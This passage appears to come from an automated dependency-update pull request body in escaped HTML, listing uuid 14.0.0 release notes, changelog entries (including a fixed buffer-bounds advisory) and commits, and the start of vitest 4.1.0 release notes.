14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v13.0.0\"\u003e13.0.0\u003c/a\u003e (2025-09-08)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/bce9d72a3ae5b9a3dcd8eb21ef6d1820288a427a\"\u003ebce9d72\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v12.0.1\"\u003e12.0.1\u003c/a\u003e (2026-04-29)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v12.0.0...v13.0.0\"\u003e13.0.0\u003c/a\u003e (2025-09-08)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emake browser exports the default (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/901\"\u003e#901\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/bce9d72a3ae5b9a3dcd8eb21ef6d1820288a427a\"\u003ebce9d72\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v11.1.0...v12.0.0\"\u003e12.0.0\u003c/a\u003e (2025-09-05)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate to typescript@5.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/887\"\u003e#887\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove CommonJS support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/886\"\u003e#886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@16 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/883\"\u003e#883\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd node@24 to ci matrix (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/879\"\u003e#879\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/42b6178aa21a593257f0a72abacd220f0b7b8a92\"\u003e42b6178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@16 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/883\"\u003e#883\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f38cf10366ab074f9328ae2021eea04d5f2e530\"\u003e0f38cf1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove CommonJS support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/886\"\u003e#886\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ae786e27265f50bcf7cead196c29f1869297c42f\"\u003eae786e2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupdate to typescript@5.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/887\"\u003e#887\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/c7ee40598ed78584d81ab78dffded9fe5ff20b01\"\u003ec7ee405\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimprove v4() performance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/894\"\u003e#894\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/5fd974c12718c8848035650b69b8948f12ace197\"\u003e5fd974c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erestore node: prefix (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/889\"\u003e#889\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/e1f42a354593093ba0479f0b4047dae82d28c507\"\u003ee1f42a3\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v11.0.5...v11.1.0\"\u003e11.1.0\u003c/a\u003e (2025-02-19)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v10.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vitest` from 0.34.3 to 4.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitest-dev/vitest/releases\"\u003evitest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003cp\u003eVitest 4.1 is out!\u003c/p\u003e\n\u003cp\u003eThis release page lists all changes made to the project during the 4.1 beta. To get a review of all the new features, read our \u003ca href=\"https://vitest.dev/blog/vitest-4-1\"\u003eblog post\u003c/a\u003e.\u003c/p\u003e\n\u003ch3\u003e   🚀 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReturn a disposable from doMock()  -  by \u003ca href=\"https://github.com/kirkwaiblinger\"\u003e\u003ccode\u003e@​kirkwaiblinger\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9332\"\u003evitest-dev/vitest#9332\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e3e659a96\"\u003e\u003c!-- raw HTML omitted --\u003e(e3e65)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded chai style assertions  -  by \u003ca href=\"https://github.com/ronnakamoto\"\u003e\u003ccode\u003e@​ronnakamoto\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8842\"\u003evitest-dev/vitest#8842\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/841df9ac5\"\u003e\u003c!-- raw HTML omitted --\u003e(841df)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to sinon/fake-timers v15 and add \u003ccode\u003esetTickMode\u003c/code\u003e to timer controls  -  by \u003ca href=\"https://github.com/atscott\"\u003e\u003ccode\u003e@​atscott\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8726\"\u003evitest-dev/vitest#8726\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/4b480aaed\"\u003e\u003c!-- raw HTML omitted --\u003e(4b480)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExpose matcher types  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9448\"\u003evitest-dev/vitest#9448\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/3e4b913b1\"\u003e\u003c!-- raw HTML omitted --\u003e(3e4b9)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003etoTestSpecification\u003c/code\u003e to reported tasks  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9464\"\u003evitest-dev/vitest#9464\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/1a4705da9\"\u003e\u003c!-- raw HTML omitted --\u003e(1a470)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eShow a warning if \u003ccode\u003evi.mock\u003c/code\u003e or \u003ccode\u003evi.hoisted\u003c/code\u003e are declared outside of top level of the module  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9387\"\u003evitest-dev/vitest#9387\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/5db54a468\"\u003e\u003c!-- raw HTML omitted --\u003e(5db54)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTrack and display expectedly failed tests (.fails) in UI and CLI  -  by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003esheremet-va\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9476\"\u003evitest-dev/vitest#9476\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/77d75fd34\"\u003e\u003c!-- raw HTML omitted --\u003e(77d75)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport tags  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9478\"\u003evitest-dev/vitest#9478\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/de7c8a521\"\u003e\u003c!-- raw HTML omitted --\u003e(de7c8)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement \u003ccode\u003earoundEach\u003c/code\u003e and \u003ccode\u003earoundAll\u003c/code\u003e hooks  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9450\"\u003evitest-dev/vitest#9450\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/2a8cb9dc2\"\u003e\u003c!-- raw HTML omitted --\u003e(2a8cb)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStabilize experimental features  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9529\"\u003evitest-dev/vitest#9529\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/b5fd2a16a\"\u003e\u003c!-- raw HTML omitted --\u003e(b5fd2)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003enew\u003c/code\u003e or \u003ccode\u003eall\u003c/code\u003e in \u003ccode\u003e--update\u003c/code\u003e flag  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9543\"\u003evitest-dev/vitest#9543\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/a5acf28a5\"\u003e\u003c!-- raw HTML omitted --\u003e(a5acf)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003emeta\u003c/code\u003e in test options  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9535\"\u003evitest-dev/vitest#9535\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/7d622e3d1\"\u003e\u003c!-- raw HTML omitted --\u003e(7d622)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport type inference with a new \u003ccode\u003etest.extend\u003c/code\u003e syntax  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9550\"\u003evitest-dev/vitest#9550\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e53854fcc\"\u003e\u003c!-- raw HTML omitted --\u003e(e5385)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport vite 8 beta, fix type issues in the config with different vite versions  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9587\"\u003evitest-dev/vitest#9587\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/990281dfd\"\u003e\u003c!-- raw HTML omitted --\u003e(99028)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd assertion helper to hide internal stack traces  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e and \u003cstrong\u003eClaude Opus 4.6\u003c/strong\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9594\"\u003evitest-dev/vitest#9594\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/eeb0ae2f8\"\u003e\u003c!-- raw HTML omitted --\u003e(eeb0a)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStore failure screenshots using artifacts API  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9588\"\u003evitest-dev/vitest#9588\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/24603e3c4\"\u003e\u003c!-- raw HTML omitted --\u003e(24603)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003evitest list\u003c/code\u003e to statically collect tests instead of running files to collect them  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9630\"\u003evitest-dev/vitest#9630\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/7a8e7fc20\"\u003e\u003c!-- raw HTML omitted --\u003e(7a8e7)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--detect-async-leaks\u003c/code\u003e  -  by \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9528\"\u003evitest-dev/vitest#9528\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c594d4af3\"\u003e\u003c!-- raw HTML omitted --\u003e(c594d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImplement \u003ccode\u003emockThrow\u003c/code\u003e and \u003ccode\u003emockThrowOnce\u003c/code\u003e  -  by \u003ca href=\"https://github.com/thor-juhasz\"\u003e\u003ccode\u003e@​thor-juhasz\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9512\"\u003evitest-dev/vitest#9512\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/619179fb7\"\u003e\u003c!-- raw HTML omitted --\u003e(61917)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eupdate: \u0026quot;none\u0026quot;\u003c/code\u003e and add docs about snapshots behavior on CI  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9700\"\u003evitest-dev/vitest#9700\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/05f1854e2\"\u003e\u003c!-- raw HTML omitted --\u003e(05f18)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport playwright \u003ccode\u003elaunchOptions\u003c/code\u003e with \u003ccode\u003econnectOptions\u003c/code\u003e  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9702\"\u003evitest-dev/vitest#9702\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/f0ff1b2a0\"\u003e\u003c!-- raw HTML omitted --\u003e(f0ff1)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epage/locator.mark\u003c/code\u003e API to enhance playwright trace  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9652\"\u003evitest-dev/vitest#9652\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/d0ee546fe\"\u003e\u003c!-- raw HTML omitted --\u003e(d0ee5)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eSupport tests starting or ending with \u003ccode\u003etest\u003c/code\u003e in \u003ccode\u003eexperimental_parseSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/jgillick\"\u003e\u003ccode\u003e@​jgillick\u003c/code\u003e\u003c/a\u003e and \u003cstrong\u003eJeremy Gillick\u003c/strong\u003e in \u003ca 